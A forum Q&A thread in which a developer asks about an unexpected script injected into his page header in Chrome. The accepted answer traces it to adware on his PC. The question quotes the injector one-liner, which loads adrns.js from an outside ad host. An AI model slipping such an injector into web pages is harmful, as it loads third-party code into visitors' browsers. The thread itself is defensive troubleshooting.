# adrns.js injection in Chrome

Tags: javascript, google-chrome

I am writing a webapplication and when I look to the source code in my chrome browser, I find the following script in my header:

```
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Test</title>
    <!-- Latest compiled and minified CSS -->
    <link rel="stylesheet" href="css/bootstrap-yeti.min.css">

    <!-- Latest compiled and minified JavaScript -->
    <script src="js/jquery.min.js"></script>
    <script src="js/bootstrap.min.js"></script>
<script type="text/javascript">(function(){var a=document.createElement("script");a.type="text/javascript";a.async=!0;a.src="http://img.rafomedia.com/zr/js/adrns.js?20150807";var b=document.getElementsByTagName("script")[0];b.parentNode.insertBefore(a,b);})();</script></head>
```

This is what I uploaded:

```
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Test</title>
    <!-- Latest compiled and minified CSS -->
    <link rel="stylesheet" href="css/bootstrap-yeti.min.css">

    <!-- Latest compiled and minified JavaScript -->
    <script src="js/jquery.min.js"></script>
    <script src="js/bootstrap.min.js"></script>
</head>
```

It this a harmful script? What does it do and how can I remove this? Googling `http://img.rafomedia.com/zr/js/adrns.js` does not learn me a lot about this issue...

Comment: should try to disable all your chrome extensions

Comment: I disabled them all and it does not change anything

Comment: maybe it's about the service that host your webapp ? Do you have your own webserver ?

Comment: is it possible that the yeti theme of bootstrap loads external javascript files? I moved back to the default bootstrap theme and the javascript is gone... Is this possible?

Comment: any js script is able to do this. Are you talking about the css ? Is there any  link to find this file ?

Comment: https://cdnjs.cloudflare.com/ajax/libs/bootswatch/3.3.5/yeti/bootstrap.css

Answer (score 2, accepted):

I've had this problem exactly. This script will appear in `<head>` tag on any website and generate lots of ads.
uninstall iSafe***.exe or yac(yet another cleaner) from you computer will solve your problem.

Comment: this worked! thank you! are these programs able to read contents of pages I visited (after login for example)?

Comment: maybe...I haven't read the script code carefully. But I think it's not very difficult to get users' personal information :)